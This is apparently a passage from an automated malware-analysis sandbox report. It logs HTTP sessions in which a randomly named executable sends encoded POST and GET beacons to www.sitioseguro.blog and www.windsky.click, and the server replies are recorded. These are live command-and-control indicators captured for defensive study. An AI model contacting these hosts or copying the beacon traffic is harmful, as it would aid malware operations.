                                                                  Data Ascii: e6sH8=HKwmnw8C74mvA+p9z1iCY1V1UgdybW9maJmexcRt5A2bu5bvDTjBuP0o5j00DljqSmWNux5dAeu4nWPLuH7RyVJJkKCl5rNLyStxlsDILiDX/7i4oo+b1YR8zsOoJWnm5XGVqji2xGGhy5vUi1JX9u6tfAT3rU4VO/r0BqtoI3+Suo02r32ts5zWwfNKJmDCDa0Je+k=
                                                                  Jan 11, 2025 01:22:46.352767944 CET954INHTTP/1.1 405 Not Allowed
                                                                  Date: Sat, 11 Jan 2025 00:22:46 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lGJ%2FxT1Rnu1%2FYoZhqPnAbn6wjbnA5auX4dNdYyqiQ%2BaGsh4yBHkB%2FGLSJK%2B5qXgIMF80DE3unBXw0Cj6n4nmQjBM9eGb9quirzURyAZM2XIy5K7l8IAtjRVxBx0dYdDmWbpTH7Dm%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c11ada2142ce-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.550002104.21.15.100801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:48.530961037 CET724OUTPOST /s7xt/ HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.sitioseguro.blog
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.sitioseguro.blog/s7xt/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 66 5a 39 31 55 69 43 64 56 56 32 49 77 64 79 52 32 39 36 61 4a 36 65 78 64 45 77 35 79 53 62 75 59 72 76 43 52 48 42 76 50 30 6f 68 54 31 38 65 31 6a 6a 53 6d 61 76 75 77 46 64 41 65 4b 34 6e 54 4c 4c 75 55 54 51 30 46 4a 48 38 36 43 6e 33 4c 4e 4c 79 53 74 78 6c 73 58 79 4c 69 37 58 2f 4f 79 34 79 4a 2b 63 70 6f 52 2f 30 73 4f 6f 44 47 6e 71 35 58 47 7a 71 6d 43 63 78 45 4f 68 79 34 66 55 69 6b 4a 55 7a 75 36 72 63 77 53 4f 72 42 49 66 41 5a 76 5a 4d 4a 55 6f 58 6e 32 4c 6d 2b 46 63 78 56 2b 46 2f 5a 66 75 67 4d 46 39 59 57 69 72 5a 35 6b 35 41 70 79 74 79 59 39 76 6c 6f 6d 41 77 46 4e 67 72 49 73 64 56 52 43 62
                                                                  Data Ascii: e6sH8=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5ySbuYrvCRHBvP0ohT18e1jjSmavuwFdAeK4nTLLuUTQ0FJH86Cn3LNLyStxlsXyLi7X/Oy4yJ+cpoR/0sOoDGnq5XGzqmCcxEOhy4fUikJUzu6rcwSOrBIfAZvZMJUoXn2Lm+FcxV+F/ZfugMF9YWirZ5k5ApytyY9vlomAwFNgrIsdVRCb
                                                                  Jan 11, 2025 01:22:48.948179007 CET944INHTTP/1.1 405 Not Allowed
                                                                  Date: Sat, 11 Jan 2025 00:22:48 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pyk1t4eCkq7TbYOKcAPsiGFySKHDb5VjDyvec2r9U2sJYBEWlUAo7i1XEJlu6lJ%2B6apCWIvIIVdwisiiCOyc5HdpdTfoX0cUFo89tXL8zGDuMFWU%2FgJ9WjLJk5p0my7hFX8eg%2BdPSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c12b0d4c78e8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2018&rtt_var=1009&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                  Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                                  Jan 11, 2025 01:22:48.948985100 CET5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.550003104.21.15.100801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:51.160696030 CET1741OUTPOST /s7xt/ HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.sitioseguro.blog
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.sitioseguro.blog/s7xt/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 66 5a 39 31 55 69 43 64 56 56 32 49 77 64 79 52 32 39 36 61 4a 36 65 78 64 45 77 35 79 61 62 74 71 7a 76 44 78 37 42 2b 2f 30 6f 73 7a 31 39 65 31 69 6a 53 6d 53 72 75 77 49 6f 41 63 69 34 68 78 44 4c 2b 31 54 51 36 46 4a 48 31 61 43 6d 35 72 4e 37 79 57 4a 31 6c 73 48 79 4c 69 37 58 2f 50 43 34 38 49 2b 63 36 34 52 38 7a 73 50 6e 4a 57 6e 47 35 58 50 47 71 6d 50 72 78 30 75 68 7a 59 50 55 67 57 68 55 2f 75 36 70 5a 77 53 2f 72 42 4e 46 41 5a 62 6a 4d 49 77 53 58 6c 6d 4c 6c 4a 67 77 6b 33 37 59 69 4c 48 73 76 4f 64 64 4e 6a 79 55 58 62 6b 56 4c 76 32 43 7a 72 52 64 74 39 4b 52 35 58 49 56 2f 35 38 39 61 6b 4c 37 78 71 4a 39 71 52 71 2f 31 37 34 7a 33 4f 37 67 67 6f 39 4c 56 55 48 7a 77 62 64 34 74 7a 73 33 66 35 58 51 73 78 2f 4d 65 7a 71 67 6a 74 73 6a 45 73 6e 4b 48 36 73 6a 47 50 4e 38 5a 4e 35 2f 75 72 33 33 37 32 31 42 7a 62 64 46 43 39 59 6b 54 77 43 65 4d 5a 66 6e 5a 75 58 50 6f 6d 55 31 79 4c 74 32 75 53 74 57 38 2b 61 79 47 4f 51 55 [TRUNCATED]
                                                                  Data Ascii: e6sH8=HKwmnw8C74mvAfZ91UiCdVV2IwdyR296aJ6exdEw5yabtqzvDx7B+/0osz19e1ijSmSruwIoAci4hxDL+1TQ6FJH1aCm5rN7yWJ1lsHyLi7X/PC48I+c64R8zsPnJWnG5XPGqmPrx0uhzYPUgWhU/u6pZwS/rBNFAZbjMIwSXlmLlJgwk37YiLHsvOddNjyUXbkVLv2CzrRdt9KR5XIV/589akL7xqJ9qRq/174z3O7ggo9LVUHzwbd4tzs3f5XQsx/MezqgjtsjEsnKH6sjGPN8ZN5/ur33721BzbdFC9YkTwCeMZfnZuXPomU1yLt2uStW8+ayGOQUw/+O6l2oTRZXwHnx/0I2Q4zEz0sPh4mt5auqMrIE6vJtOZHm8pfU0zlUC6BApk9wlOBn0Hrxtco4noD2yZV75+teZpriXsrvRQwL3+EBa+eUu9XBfZ+iMipjIsFbM4yAONeoovwjabLCv/tIyy4cjAPOstVGYZnIi88kzyXjKQfM9MKVFybDp0vMiuTKiKL/UTh5JMjONF8A5T0rr0RLmpos0wZD+pRBSASUw5EQSEwHZ+S1Nd9hiKEWlkSlU2t8NERjiSHuk31IAUVU3oqwImqnXYU/+k6DpxhJxmeTAanejdmFbueP1Efxlvr/kIjp6pcGejTfWyGS7XKdcSRBSDR3RX0L7jsF94Z/1yKxTe6ljT7YY2FMV7xPN2HSFHYi0L5cir255mBRFOqFGPDw+EOk7DHC64LuPoFXQhi8MMeithjllrsKhhVb9+fxNiFwm/T5BlHQwgoOug6fYS0RyHvCzUu80VvWQQXShA70ymZO7DIT7cc1CfoNHTt3Z3l51sKVK2vw1wYqpeU9rx+//8Mv+O4SvlCUy1pIgCQ8jnOYEuzkYBNbOLMhs1jAYmmqR4hqlwA+xeSz9/zSITN4aFaHj+C3uKbw2G29i2ZizRRB17k5ToJuA0nz7iBJqv3dnmr/bcHiFjSYxfQ0liyLgtXOPuquDAbFxZ [TRUNCATED]
                                                                  Jan 11, 2025 01:22:51.624514103 CET951INHTTP/1.1 405 Not Allowed
                                                                  Date: Sat, 11 Jan 2025 00:22:51 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SkGPCKKWsTKfS9pU9iP6yE%2B87Ls5k2j0uDGWvFZuLh1vO3v7CSHVMY6%2FdVsAbxZdj9Jwgz%2FiBeflAsgXPrXj0vQgP8y113yG4OVl7XNdGqmyu7iSxXM2ckiZ%2BHZUvpn00ySCkZBVGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c13bca16de92-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1441&min_rtt=1441&rtt_var=720&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1741&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.550004104.21.15.100801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:53.713139057 CET437OUTGET /s7xt/?e6sH8=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA9TJ417GC4aJAohl/0/HIB1aq1+GW1q6O2aRbrP6PH2e8rA==&rr=BbldmNsp8 HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:54.253364086 CET1236INHTTP/1.1 200 OK
                                                                  Date: Sat, 11 Jan 2025 00:22:54 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                  Accept-Ranges: bytes
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iU1KpoOQPqAtlvWomR55llqJF51RecMhA0OQ%2FywEAh%2Fox%2F%2FWM9bmPnHLuqr6ESWbNmpmIqtX%2Buc2DmIvDLH1ZuWGUgEiz9Tj4%2BSAknGalZaxzIuMak8JUVSbjiCU70PBkSrFAK%2BsbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9000c14c4e1c0fa1-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1468&min_rtt=1468&rtt_var=734&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=437&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                                  Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before
                                                                  Jan 11, 2025 01:22:54.253432035 CET1236INData Raw: 2c 61 2c 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77
                                                                  Data Ascii: ,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;l
                                                                  Jan 11, 2025 01:22:54.253469944 CET1236INData Raw: 61 69 6e 20 2e 73 76 67 2d 6f 6e 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76
                                                                  Data Ascii: ain .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line
                                                                  Jan 11, 2025 01:22:54.253506899 CET1236INData Raw: 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 36 38 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74
                                                                  Data Ascii: st{padding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:
                                                                  Jan 11, 2025 01:22:54.253544092 CET1236INData Raw: 70 28 31 2e 35 72 65 6d 20 2c 2d 30 2e 32 35 36 30 39 37 35 36 31 72 65 6d 20 2b 20 38 2e 37 38 30 34 38 37 38 30 34 39 76 77 20 2c 33 2e 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 6c 61
                                                                  Data Ascii: p(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}}@supports not (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-t
                                                                  Jan 11, 2025 01:22:54.253580093 CET1236INData Raw: 2e 38 37 35 72 65 6d 20 2b 20 2e 31 38 37 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31
                                                                  Data Ascii: .875rem + .1875*(100vw - 20rem)/ 25.625)}}@supports (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)}}@supports not (margin-bot
                                                                  Jan 11, 2025 01:22:54.253617048 CET776INData Raw: 36 33 34 31 76 77 20 2c 31 2e 38 37 35 72 65 6d 29 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 74 6f 70 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33
                                                                  Data Ascii: 6341vw ,1.875rem)}}@supports not (margin-top:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__actions,.window-main__body{margin-top:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}}a{transition: all 0.4s; background-color:
                                                                  Jan 11, 2025 01:22:54.253652096 CET1236INData Raw: 39 43 32 38 37 2e 39 39 20 34 31 38 2e 34 37 32 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 20 33 36 30 2e 35 32 32 20 35 36 33 2e 34 32 31 5a 22 20 66 69 6c 6c 3d 22 23 30 30 34 39 38 44 22 20 2f 3e 0a 09 09 09 09 09 09 3c 2f 67 3e 0a 09 09
                                                                  Data Ascii: 9C287.99 418.472 360.522 563.421 360.522 563.421Z" fill="#00498D" /></g><g opacity="0.7" filter="url(#filter1_f_2001_5)"><ellipse cx="50.6112" cy="60.3996" rx="50.6112" ry="60.3996" transform="matrix(-0.916366 0.400341 -0
                                                                  Jan 11, 2025 01:22:54.253690004 CET1236INData Raw: 61 63 69 74 79 3d 22 30 22 20 72 65 73 75 6c 74 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65
                                                                  Data Ascii: acity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><
                                                                  Jan 11, 2025 01:22:54.253727913 CET1236INData Raw: 6f 75 72 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 6e 20 41 41 41 41 20 72 65 63 6f 72 64 2c 20 62 75 74 20 74 68 65 20 73 69 74 65 20 6f 6e 6c 79 20 77 6f 72 6b 73 20 77 69 74 68 20 49 50 76 34 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 3c 2f 6c
                                                                  Data Ascii: our domain has an AAAA record, but the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View
                                                                  Jan 11, 2025 01:22:54.253839970 CET654INData Raw: 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72 65 73 75 6c 74 3d 22 73 68 61 70 65 22 20 2f 3e 0a 09 09 09 09 09 09 09 09 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 37 35 22 20 72
                                                                  Data Ascii: "BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_10" /></filter><filter id="filter1_f_2001_10" x="27.2657" y="0.225037" width="703.261" height="829.52" filterU


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.55000546.253.5.221801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:59.310364008 CET695OUTPOST /gybb/ HTTP/1.1
                                                                  Host: www.windsky.click
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.windsky.click
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.windsky.click/gybb/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 73 43 63 55 73 46 35 56 6c 57 68 58 4d 59 31 58 6d 6c 38 57 31 31 30 69 6b 47 39 69 59 74 2b 6c 53 4d 74 36 43 33 74 39 74 46 66 4a 55 7a 6d 7a 41 52 4c 30 48 78 34 48 4c 2b 4f 69 5a 43 76 50 71 69 52 30 73 58 35 7a 38 4a 73 4b 4a 49 48 55 32 58 73 64 31 66 6b 43 58 6e 64 55 71 49 61 53 6f 37 58 65 6b 79 56 59 66 6d 72 38 55 32 74 6b 4a 33 4e 50 4a 78 77 43 37 4b 61 4a 51 54 6a 2f 79 72 52 56 4f 33 44 36 4f 64 5a 61 41 58 4d 33 2f 73 61 46 4c 68 38 45 48 54 6b 72 42 63 4c 47 44 42 4c 35 55 36 71 64 37 5a 47 55 6d 76 76 79 61 58 6b 58 4e 31 34 68 53 6f 65 68 5a 41 51 6e 31 42 4b 6c 2f 62 34 3d
                                                                  Data Ascii: e6sH8=sCcUsF5VlWhXMY1Xml8W110ikG9iYt+lSMt6C3t9tFfJUzmzARL0Hx4HL+OiZCvPqiR0sX5z8JsKJIHU2Xsd1fkCXndUqIaSo7XekyVYfmr8U2tkJ3NPJxwC7KaJQTj/yrRVO3D6OdZaAXM3/saFLh8EHTkrBcLGDBL5U6qd7ZGUmvvyaXkXN14hSoehZAQn1BKl/b4=
                                                                  Jan 11, 2025 01:23:00.101434946 CET774INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Sat, 11 Jan 2025 00:22:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Language: en
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Referrer-Policy: origin-when-cross-origin
                                                                  X-XSS-Protection: 1; mode=block
                                                                  Expect-CT: enforce; max-age=3600
                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                  Strict-Transport-Security: max-age=63072000
                                                                  Content-Encoding: gzip
